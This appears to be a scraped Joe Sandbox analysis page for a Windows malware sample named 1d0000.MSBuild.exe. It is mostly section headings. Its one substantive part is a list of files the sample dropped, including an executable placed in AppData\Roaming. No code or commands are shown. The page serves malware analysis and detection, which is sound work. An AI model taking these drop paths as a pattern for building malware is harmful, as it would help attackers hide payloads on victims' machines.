Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1d0000.MSBuild.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\1d0000.MSBuild.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkzaqcga.nqy.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rhpu5wea.rea.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QUF1NVVHW3OTUB5EOR5A.temp

C:\Users\user\AppData\Roaming\X9ZLAQA9VR.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
1d0000.MSBuild.exe